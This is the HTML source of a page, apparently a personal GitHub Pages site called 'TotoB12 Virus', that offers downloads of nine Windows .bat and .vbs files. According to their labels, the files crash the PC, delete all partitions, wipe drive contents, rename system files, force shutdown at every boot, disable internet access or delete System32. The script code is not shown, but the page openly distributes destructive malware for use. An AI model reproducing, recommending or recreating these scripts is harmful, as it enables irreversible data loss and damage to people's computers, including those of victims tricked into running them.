<!DOCTYPE html>
<html>
<head>
  <title>TotoB12 Virus</title>
  <link rel="icon" type="image/x-icon" href="totob12icondark.png">
  
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="apple-touch-icon" href="favicon.ico">
  
<style> 
   
   body {
     background-color: #1a1d21; 
     margin: 0px;
   }
   
   button { 
   padding: 16px 16px; 
   border-radius: 12px; 
   transition-duration: 0.4s; 
   box-shadow: 0 8px 16px 0 rgba(0,0,0,0.2), 0 6px 20px 0 rgba(0,0,0,0.19); 
   width: 100%; 
   cursor: pointer; 
   opacity: 0.8; 
   color: white;
   font-family: "Century Gothic", "Monospace";
   background-color: #5885AF;
   margin: 16px 0px; 
   border: 2px solid #C3E0E5;
   } 
   
   button:hover { 
   opacity: 1; 
   } 
   
   .w2 { 
   background-color: #212121; 
   border: 2px solid #f44336; 
   width: 100%;
   color: #f44336;
   } 
   
   .title { 
   background-color: #f44336;
   color: black;
   padding: 32px 16px; 
   margin: 0px; 
   font-family: "Century Gothic", "Monospace";
   font-size: 64px;
   text-align: center; 
   } 
      
   .box {
   margin: 16px 16px;
   padding: 0 0;
   }
   
   .warningt {
     color: #f44336;
     text-align: center;
     font-family: "Century Gothic", "Monospace";
     margin: 16px 16px;
     font-size: 32px;
   }
   .warning {
     color: white;
     text-align: center;
     font-family: "Century Gothic", "Monospace";
     margin: 16px 16px;
   }
     
   </style>

</head>
<body>

<h1 class="title">
  <a href="https://totob12.github.io/">
  <img class="titleimg" src="/things/totob12title2dark.png" align="center" width=30%>
    </h1>

<p class="warningt">
&#9888; &#x26A0; WARNING &#9888; &#x26A0; 
</p>
<p class="warning">
This virus is safe to download but can damage your device if opened.<br>
Be responsible for your actions.
</p>
<div class="box">
  <button class="w2" onclick="window.location.href='https://totob12.github.io/things/virus1.bat';">
Crash Any PC - cmd (Windows)</button>
  <button class="w2" onclick="window.location.href='https://totob12.github.io/things/virus2.bat';">
Delete all partitions (Windows)</button>
  <button class="w2" onclick="window.location.href='https://totob12.github.io/things/virus3.bat';">
Delete all content of drive (Windows)</button>
  <button class="w2" onclick="window.location.href='https://totob12.github.io/things/virus4.vbs';">
Delete Any PC - tourstart (Windows)</button>
  <button class="w2" onclick="window.location.href='https://totob12.github.io/things/virus5.bat';">
Shutdown PC everytime it's turned on (Windows)</button>
  <button class="w2" onclick="window.location.href='https://totob12.github.io/things/virus6.bat';">
Disable I-net(Windows)</button>
  <button class="w2" onclick="window.location.href='https://totob12.github.io/things/virus7.bat';">
Rename all system files to .txt (Windows)</button>
  <button class="w2" onclick="window.location.href='https://totob12.github.io/things/virus8.bat';">
System Meltdown (Windows)</button>
  <button class="w2" onclick="window.location.href='https://totob12.github.io/things/virus9.bat';">
Delete System32 (Windows)</button>
</div>
</body>
</html>
